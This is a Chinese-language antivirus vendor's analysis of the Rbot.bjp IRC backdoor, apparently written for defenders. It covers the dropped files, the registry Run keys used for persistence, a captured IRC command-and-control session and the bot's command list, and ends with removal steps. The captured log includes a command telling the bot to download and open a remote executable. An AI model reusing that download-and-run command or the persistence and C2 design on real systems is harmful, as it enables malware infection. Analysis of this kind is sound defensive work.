簡介
病毒名稱: Backdoor.Win32.Rbot.bjp
中文名稱: IRC機器人變種
檔案 MD5: 5022311D3F95A475C11C03B0DB22B007
檔案長度: 脫殼前75,855位元組,脫殼後518,656 位元組
感染系統: Win9X以上系統
開發工具: Microsoft Visual C++ 6.0
加殼工具: 未知殼
行為分析
1 、衍生下列副本與檔案:
%WINDOWS%\System32\svcchost.exe
%Documents and Settings%\當前用戶名\Local Settings\Temp\fdsf.exe
2 、新建註冊表鍵值:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msvcc25
Value: String: "svcchost.exe "
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
RunServices\msvcc25
Value: String: "svcchost.exe "
3 、連線網路下載病毒體:
// 連線 IRC 伺服器,接收下載指令,伺服器地址 :66.109.25.***:11640
NICK CHN|355814
USER fjbwnju 0 0 :CHN|355814
:NaNu 001 CHN|355814 :MySQL CHN|[email protected].***
:NaNu 376 CHN|355814 :
:CHN|355814 MODE CHN|355814 :+i
USERHOST CHN|355814
:NaNu 302 CHN|355814 :CHN|[email protected].***
MODE CHN|355814 +x+i
JOIN ##salvage,##salvage2 he 爃 e
:CHN|[email protected].*** JOIN :##salvage :
NaNu 332 CHN|355814 ##salvage :
. 燿 http://72.20.4.***:1182/4.exe fdsf.exe 1
:NaNu 333 CHN|355814 ##salvage 10:30 PM 1184798286
:NaNu 366 CHN|355814 ##salvage :End of /NAMES list.
:CHN|[email protected].*** JOIN :##salvage2
:NaNu 366 CHN|355814 ##salvage2 :End of /NAMES list.
PRIVMSG ##salvage :[DOWNLOAD]: Downloading URL:
http://72.20.4.***:1182/4.exe to: fdsf.exe.// 下載地址
PRIVMSG ##salvage :[DOWNLOAD]: Downloaded 70.7 KB to fdsf.exe @ 8.8 KB/sec.
PRIVMSG ##salvage :[DOWNLOAD]: Opened: fdsf.exe.
4 、回響的IRC命令包括下列:
ping
pong
join
userhost
host
nick
kick
part
quit
notice
rn
logout
clone
clonestop
scan
scanstop
reconnect
disconnect
sysinfo
killthread
open
upload
reboot
download
註: %System% 是一個可變路徑。病毒通過查詢作業系統來決定當前 System 資料夾的位置。Windows2000/NT 中默認的安裝路徑是 C:\Winnt\System32 , windows95/98/me 中默認的
安裝路徑是 C:\Windows\System , windowsXP 中默認的安裝路徑是 C:\Windows\System32 。
--------------------------------------------------------------------------------
清除方案
1 、 使用安天木馬防線可徹底清除此病毒 ( 推薦 )
2 、 手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。
(1) 使用 安天木馬防線結束下列進程:
svcchost.exe
(2)恢復病毒修改的註冊表項目,刪除病毒添加的註冊表項:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run\msvcc25
Value: String: " 病毒檔案名稱 .exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\RunServices\msvcc25
Value: String: " 病毒檔案名稱 .exe"
(3) 刪除病毒釋放檔案:
%WINDOWS%\System32\svcchost.exe
%Documents and Settings%\ 當前用戶名 \
Local Settings\Temp\fdsf.exe